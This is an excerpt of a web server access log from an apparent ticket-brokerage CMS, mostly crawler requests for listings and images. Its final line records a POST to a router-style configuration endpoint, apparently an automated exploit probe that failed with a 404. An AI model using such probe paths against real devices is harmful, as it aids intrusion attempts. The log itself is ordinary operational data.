217.113.194.216 - - [19/Jul/2024:04:28:43 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=04745230-C0F0-DC87-23F9-862A2DFE2F25 HTTP/1.1" 200 101814
207.46.13.229 - - [19/Jul/2024:04:28:45 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
52.167.144.139 - - [19/Jul/2024:04:28:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/front_page/no/2015_no_startbild.png HTTP/1.1" 200 175645
217.113.194.218 - - [19/Jul/2024:04:28:51 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9&eventid=170A5EAC-FAAE-EE4F-D4BA-D85CE28A6908 HTTP/1.1" 200 83397
47.128.122.144 - - [19/Jul/2024:04:28:53 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=A27091AD-1422-96A9-33A7-74A8DECA25F3 HTTP/1.1" 200 111389
47.128.122.144 - - [19/Jul/2024:04:28:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.122.144 - - [19/Jul/2024:04:28:54 +0200] "GET /ticket2/opencms/venue/goodison_park.png HTTP/1.1" 200 179209
47.128.122.144 - - [19/Jul/2024:04:28:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
47.128.122.144 - - [19/Jul/2024:04:28:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
47.128.122.144 - - [19/Jul/2024:04:28:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.122.144 - - [19/Jul/2024:04:28:55 +0200] "GET /ticket2/opencms/no/ask-form.html HTTP/1.1" 200 2919
217.113.194.216 - - [19/Jul/2024:04:28:59 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=52936B83-375A-A2F0-9D1E-378B47CF585E HTTP/1.1" 200 82149
37.60.249.191 - - [19/Jul/2024:04:29:07 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EA4DD9AE-DDBE-78E3-22DF-EC27364AEC73&sortorder=asc&column=section HTTP/1.1" 404 -
217.113.194.217 - - [19/Jul/2024:04:29:08 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=6246A7B9-7760-A5B4-1D19-4DF416B28BC3 HTTP/1.1" 200 82149
66.249.79.231 - - [19/Jul/2024:04:29:15 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/tottenham/ HTTP/1.1" 200 85252
47.128.52.2 - - [19/Jul/2024:04:29:16 +0200] "GET /ticket2/opencms/sv/buy/?catid=6BD6E0B0-84AF-3A0D-3851-C1357CE9B771&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 82376
217.113.194.218 - - [19/Jul/2024:04:29:16 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=D0B62F92-773A-01D8-AF39-BADE4098B080 HTTP/1.1" 200 98369
66.249.76.168 - - [19/Jul/2024:04:29:16 +0200] "GET /ticket2/opencms/fi/venue/?venueid=91CC5869-2AA5-E430-A488-769315842D86 HTTP/1.1" 200 72298
47.128.52.2 - - [19/Jul/2024:04:29:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.52.2 - - [19/Jul/2024:04:29:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
94.156.10.163 - - [19/Jul/2024:04:29:19 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 -
